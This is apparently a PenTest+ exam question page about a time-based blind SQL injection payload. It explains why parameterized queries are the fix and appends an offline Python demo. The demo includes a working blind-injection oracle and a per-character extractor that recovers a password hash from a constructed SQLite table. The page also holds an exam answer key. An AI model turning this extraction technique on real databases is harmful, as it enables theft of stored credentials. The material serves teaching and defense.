
PT0-002 Question #382: Real Exam Question with Answer & Explanation


Attacks and Exploits

Question

A penetration tester managed to exploit a vulnerability using the following payload: IF (1=1) WAIT FOR DELAY '0:0:15' Which of the following actions would best mitigate this type of attack?

Options

  • A. Encrypting passwords
  • B. Parameterizing queries
  • C. Encoding output
  • D. Sanitizing HTML

Explanation

The correct answer is B: Parameterizing queries. The payload is a time-based blind SQL injection. WAITFOR DELAY is a Transact-SQL statement (Microsoft SQL Server), and the injected IF makes the database pause for 15 seconds only when the condition is true. With 1=1 the condition is always true, so a 15-second response confirms that the input reaches the query parser as SQL. The tester then swaps in conditions about the data (for example, a test on one character of a column value) and reads the answer from the response time, extracting the database one true/false question at a time even though no query output is ever displayed.

The root cause is that user input is concatenated into the SQL string and parsed as code. Parameterized queries (prepared statements) fix that: the statement is sent with placeholders, and the input is bound as a value, so whatever it contains is compared as data and never interpreted as SQL. The other options do not address the injection point. Encrypting (or, for credentials, hashing) passwords limits what an attacker gains after a successful extraction; encoding output and sanitizing HTML defend against cross-site scripting, not SQL injection.

Two caveats matter in practice. Parameterization protects values only; identifiers such as table and column names, and ORDER BY targets, cannot be bound and must be checked against an allowlist. Stored procedures that build dynamic SQL internally (EXEC of a concatenated string) remain injectable even when called with parameters. A least-privilege database account and a web application firewall are useful defense in depth, but neither removes the vulnerability.
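The following is an added example, not part of the exam page: it shows the vulnerable concatenated query beside its parameterized form, then runs the time-based oracle described above against the vulnerable one to recover characters of a column value. The table contents, the hash values and the `sleep()` function are all constructed for an offline demo; SQLite has no WAITFOR DELAY, so a registered Python function stands in for it.

```python
import sqlite3
import time

# Added example, not from the exam page. The users table, the hash values and
# the sleep() stand-in are constructed so the demo runs offline in SQLite.

DELAY = 0.3  # seconds the "true" branch sleeps; the exam payload uses 15 s


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "$2b$12$constructedhashA"), (2, "bob", "$2b$12$constructedhashB")],
    )
    # Stand-in for T-SQL WAITFOR DELAY: sleep(seconds) pauses, then returns 0.
    con.create_function("sleep", 1, lambda s: time.sleep(s) or 0)
    return con


def vulnerable_lookup(con, user_id):
    """Builds the statement by concatenation: user_id is parsed as SQL."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    return [row[0] for row in con.execute(sql)]


def parameterized_lookup(con, user_id):
    """Binds user_id as a value: the engine never parses it as SQL."""
    sql = "SELECT username FROM users WHERE id = ?"
    return [row[0] for row in con.execute(sql, (user_id,))]


def elapsed(fn, con, user_id):
    """Wall-clock time of one lookup, the only signal a blind attacker gets."""
    start = time.monotonic()
    fn(con, user_id)
    return time.monotonic() - start


def oracle(con, condition):
    """Time-based blind probe against the vulnerable lookup.

    Same idea as IF (<cond>) WAITFOR DELAY '0:0:15': the response is slow
    only when <cond> is true, so each request answers one yes/no question.
    """
    payload = f"1 AND CASE WHEN ({condition}) THEN sleep({DELAY}) ELSE 0 END = 0"
    return elapsed(vulnerable_lookup, con, payload) >= DELAY / 2


def extract_char(con, column, username, position, charset="$0123456789abcdef"):
    """Recovers one character of a column value by asking the oracle per candidate."""
    for ch in charset:
        cond = (
            f"substr((SELECT {column} FROM users WHERE username='{username}'), "
            f"{position}, 1) = '{ch}'"
        )
        if oracle(con, cond):
            return ch
    return None


if __name__ == "__main__":
    con = make_db()
    print(vulnerable_lookup(con, "1 OR 1=1"))      # every row leaks
    print(parameterized_lookup(con, "1 OR 1=1"))   # no row: compared as a string
    print(oracle(con, "1=1"), oracle(con, "1=2"))  # True False
    print("".join(extract_char(con, "pw_hash", "bob", i) for i in (1, 2, 3)))
```

Run against the vulnerable function, `1 OR 1=1` returns every user and the oracle leaks `bob`'s hash one character per round of probes; run against the parameterized function, the same strings are bound as a single value that matches no integer id, and no delay ever occurs. The threshold of half the delay keeps the oracle robust to scheduling jitter in either direction.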

Topics

#SQL Injection#Web Application Security#Vulnerability Mitigation#Parameterized Queries
